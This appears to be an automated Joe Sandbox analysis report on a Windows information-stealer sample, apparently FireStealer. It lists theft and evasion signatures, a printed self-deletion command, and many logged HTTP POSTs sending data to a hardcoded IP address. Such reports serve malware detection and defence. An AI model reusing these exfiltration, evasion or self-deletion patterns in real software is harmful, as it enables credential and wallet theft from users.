Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
app.exe

Overview

General Information

Sample name:app.exe
Analysis ID:1436386
MD5:75b9ef9142a78671d449c8d22ab6be14
SHA1:0461f1c46644acde8020bb59b53b1e34b65977ca
SHA256:e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains functionality to infect the boot sector
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Self deletion via cmd or bat file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • app.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
    • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • app.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 1808 cmdline: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 1172 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:05/05/24-00:24:50.450010
SID:2051909
Source Port:80
Destination Port:49789
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeVirustotal: Detection: 11%Perma Link
Multi AV Scanner detection for submitted file
Source: app.exeVirustotal: Detection: 11%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: app.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255EB69 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,CloseHandle,HeapFree,HeapFree,ReadFile,ReadFile,CryptUnprotectData,CryptUnprotectData,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,HeapFree,ReadFile,ReadFile,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\app.exeUnpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeUnpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: app.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E4B93 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B4B93 FindFirstFileExW,

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2051909 ET TROJAN Win32/FireStealer Related Server Response 144.208.127.230:80 -> 192.168.11.20:49789
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewASN Name: SHOCK-1US SHOCK-1US
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 451Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 996Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1008Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1007Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 992Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1004Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1005Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1000Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 999Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 998Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 992Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 995Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 999Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1010Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1010Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 994Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1006Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1005Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1008Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1001Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 996Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 998Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 185Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 993Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1001Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1000Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1000Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 995Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 997Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1003Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1013Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1014Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 998Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1010Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1009Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1012Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1006Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1006Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1005Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1001Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 100842Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 29428Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 57241Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1270200Host: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 451Host: 144.208.127.230
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230
Source: app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3141697165.000000000559A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.000000000094A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242018626.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3185017394.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3262410113.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3137031558.000000000558E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000094A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005591000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101657336.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/7
